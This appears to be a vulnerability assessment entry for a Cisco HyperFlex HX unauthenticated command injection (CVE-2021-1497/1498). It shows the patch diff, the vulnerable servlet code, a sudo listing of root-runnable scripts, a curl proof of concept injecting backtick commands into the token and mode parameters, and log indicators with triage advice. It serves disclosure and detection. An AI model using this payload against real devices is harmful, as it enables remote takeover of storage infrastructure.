Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory. **Recent assessments:** **wvu-r7** at May 18, 2021 12:18am UTC reported: _Attacker value is a little lower because I was able to test only the installer._ # CVE-2021-1497/CVE-2021-1498 Command injection in the `/storfs-asup` endpoint’s `token` and `mode` parameters. ## Patch
--- unpatched/web.xml 2021-05-17 19:06:17.000000000 -0500
+++ patched/web.xml 2021-05-17 19:06:23.000000000 -0500
@@ -69,17 +69,6 @@
 </servlet-mapping>
 <servlet>
- <servlet-name>Springpath Storfs ASUP</servlet-name>
- <servlet-class>com.storvisor.sysmgmt.service.StorfsAsup</servlet-class>
- <load-on-startup>1</load-on-startup>
- </servlet>
-
- <servlet-mapping>
- <servlet-name>Springpath Storfs ASUP</servlet-name>
- <url-pattern>/storfs-asup/*</url-pattern>
- </servlet-mapping>
-
- <servlet>
 <servlet-name>Springpath Upgrade Image Upload Service</servlet-name>
 <servlet-class>com.storvisor.sysmgmt.service.StorvisorFileUploader</servlet-class>
 </servlet>
## Vulnerability protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { String action = request.getParameter("action"); if (action == null) { String msg = "Action for the servlet need be specified."; writeErrorResponse(response, msg); return; } try { String token = request.getParameter("token"); StringBuilder cmd = new StringBuilder(); cmd.append("exec /bin/storfs-asup "); cmd.append(token); String mode = request.getParameter("mode"); cmd.append(" "); cmd.append(mode); cmd.append(" > /dev/null"); logger.info("storfs-asup cmd to run : " + cmd); ProcessBuilder pb = new ProcessBuilder(new String[] { "/bin/bash", "-c", cmd.toString() }); logger.info("Starting the storfs-asup now: "); long startTime = System.currentTimeMillis(); Process p = pb.start(); InputStream errStream = p.getErrorStream(); String errMsg = FileUtils.readToString(errStream); int exitCode = p.waitFor(); long timeTaken = System.currentTimeMillis() - startTime; logger.info("storfs-asup command completed in (" + timeTaken + " ) milliseconds, with exit code (" + exitCode + ") and error message: " + errMsg); errStream.close(); OutputStream outStream = p.getOutputStream(); outStream.flush(); outStream.close(); if (exitCode != 0) throw new Exception(errMsg); } catch (IOException ex) { logger.error("Failed to generate asup: " + ex); } catch (Exception ie) { logger.error("Failed to run the 
/bin/storfs-asup command."); } finally { logger.info("Done executing asup command. "); } } tomcat7@HyperFlex-Installer-4:~$ sudo -l Matching Defaults entries for tomcat7 on HyperFlex-Installer-4: !lecture, tty_tickets, !fqdn User tomcat7 may run the following commands on HyperFlex-Installer-4: (ALL) NOPASSWD: /opt/springpath/storfs-support/support.py (ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_asup.sh (ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_sch.sh tomcat7@HyperFlex-Installer-4:~$ sudo /opt/springpath/storfs-support/support.py --help Usage: support.py [options] Options: -h, --help show this help message and exit -t TARGET, --target=TARGET Target directory where the support bundle should go (XXX: This could be a remote host(dir), ex: hostname:/foo). Optional. Default = /tmp -i INSTALLDIR, --installdir=INSTALLDIR Install directory for storfs. Optional. -k ZKDIR, --zkdir=ZKDIR zookeeper directory for storfs. Optional -l LOGDIR, --logdir=LOGDIR log directory for storfs. Optional --asupdir=ASUPDIR asup directory for storfs. Optional -c COREDIR, --coredir=COREDIR core directory for storfs. Optional -m MANIFESTDIR, --manifestdir=MANIFESTDIR Manifest directory for storfs support. All files with .mfx extension in this directory will be processed. Optional --list List the manifests. Optional -f MANIFESTFILES, --manifest-file=MANIFESTFILES Manifest file to use for generating support. Multiple manifest files can be specified. Manifests files are required to have .mfx suffix. Optional (Cannot be with -m option) -e TOOLSEXEDIR, --toolsexedir=TOOLSEXEDIR log directory for storfs binary files. Optional --hypervdir=HYPERVDIR log directory for hyperv binary files. Optional -o TOOLSDIR, --toolsdir=TOOLSDIR Path for storfs tools. Optional -r RUNTIMEDIR, --runtimedir=RUNTIMEDIR Path for runtime dir (which contains storfs_running_process.pid files). Optional -b BUILDTYPE, --buildtype=BUILDTYPE Build type that was running. Optional. 
Default = debug -a ADDITIONAL_FILES, --additional-files=ADDITIONAL_FILES any additional files/directories (not in manifest) that should be added to the support bundle. Optional. --dry-run Process manifests to make sure that there are no errors tomcat7@HyperFlex-Installer-4:~$ ls /opt/springpath/storfs-support/*.mfx /opt/springpath/storfs-support/springpath-basic.mfx /opt/springpath/storfs-support/springpath-zookeeper-no-db.mfx /opt/springpath/storfs-support/springpath.mfx /opt/springpath/storfs-support/springpath-logs.mfx /opt/springpath/storfs-support/springpath-default-os.mfx /opt/springpath/storfs-support/springpath-extended.mfx /opt/springpath/storfs-support/springpath-default-asup.mfx /opt/springpath/storfs-support/deployment.mfx /opt/springpath/storfs-support/springpath-mgmt.mfx /opt/springpath/storfs-support/springpath-witness.mfx /opt/springpath/storfs-support/springpath-default-asup-cli-esx.mfx /opt/springpath/storfs-support/springpath-default-asup-hyperv.mfx /opt/springpath/storfs-support/springpath-zookeeper.mfx /opt/springpath/storfs-support/springpath-default-asup-esx.mfx /opt/springpath/storfs-support/springpath-default-event-asup.mfx /opt/springpath/storfs-support/springpath-perf.mfx /opt/springpath/storfs-support/springpath-default-asup-cli-hyperv.mfx /opt/springpath/storfs-support/springpath-exhaustive.mfx tomcat7@HyperFlex-Installer-4:~$ head /opt/springpath/storfs-support/springpath-basic.mfx # Springpath manifest file. Contains just basic logs. 
# Simplified from springpath-mgmt.mfx ["copy", "TIMEOUT_NONE", "IGNORE_ERROR", "/var/jail/var/log/springpath"] ["copy", "TIMEOUT_NONE", "IGNORE_ERROR", "/etc/iptables_node_cluster.rules"] ["exec", "TIMEOUT_NONE", "IGNORE_ERROR", "iptables --list -n -v"] ["exec", "TIMEOUT_NONE", "IGNORE_ERROR", "bom-check.sh"] ["exec", "TIMEOUT=120", "IGNORE_ERROR", "mstcli cluster diag"] ["exec", "TIMEOUT=45", "IGNORE_ERROR", "mstcli cluster info"] ["exec", "TIMEOUT=45", "IGNORE_ERROR", "mstcli appliance list"] ["exec", "TIMEOUT=45", "IGNORE_ERROR", "mstcli datastore list"] tomcat7@HyperFlex-Installer-4:~$ ## PoC wvu@kharak:~$ curl -v -d 'action=&token=`id`&mode=`id`' * Trying * TCP_NODELAY set * Connected to ( port 80 (#0) > POST /storfs-asup HTTP/1.1 > Host: > User-Agent: curl/7.64.1 > Accept: */* > Content-Length: 28 > Content-Type: application/x-www-form-urlencoded > * upload completely sent off: 28 out of 28 bytes < HTTP/1.1 200 OK < Server: nginx/1.8.1 < Date: Tue, 18 May 2021 00:54:26 GMT < Content-Length: 0 < Connection: keep-alive < Front-End-Https: on < * Connection #0 to host left intact * Closing connection 0 wvu@kharak:~$ ## IOCs ==> /var/log/nginx/access.log <== - - [17/May/2021:17:54:26 -0700] "POST /storfs-asup HTTP/1.1" 200 0 "-" "curl/7.64.1" ==> /var/log/springpath/stBootstrapGuiBackend.log <== 2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null 2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():64 - Starting the storfs-asup now: 2021-05-18-00:54:26.017 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory 2021-05-18-00:54:26.020 [tomcat-http-2] ERROR com.storvisor.sysmgmt.service.StorfsAsup.processRequest():89 - 
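Failed to run the /bin/storfs-asup command. 2021-05-18-00:54:26.020 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():91 - Done executing asup command. ==> /var/log/tomcat7/catalina.out <== 2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null 2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:64 - Starting the storfs-asup now: 2021-05-18-00:54:26.017 INFO com.storvisor.sysmgmt.service.StorfsAsup:71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory 2021-05-18-00:54:26.020 ERROR com.storvisor.sysmgmt.service.StorfsAsup:89 - Failed to run the /bin/storfs-asup command. 2021-05-18-00:54:26.020 INFO com.storvisor.sysmgmt.service.StorfsAsup:91 - Done executing asup command. ==> /var/log/tomcat7/localhost_access_log.2021-05-17.txt <== - - [17/May/2021:17:54:26 -0700] "POST /storfs-asup HTTP/1.0" 200 -
Note when triaging these entries: the exit code (127) and the "Failed to run the /bin/storfs-asup command." error only show that `/bin/storfs-asup` does not exist on the installer. Because the logged string is handed to `/bin/bash -c`, bash evaluates the backtick substitutions before the `exec` fails, so a `storfs-asup cmd to run` line containing shell metacharacters should be treated as evidence of command execution, not as a failed request. The HTTP response is `200` with an empty body in either case, so the access logs alone do not distinguish the outcome.
Assessed Attacker Value: 4 Assessed Attacker Value: 4Assessed Attacker Value: 5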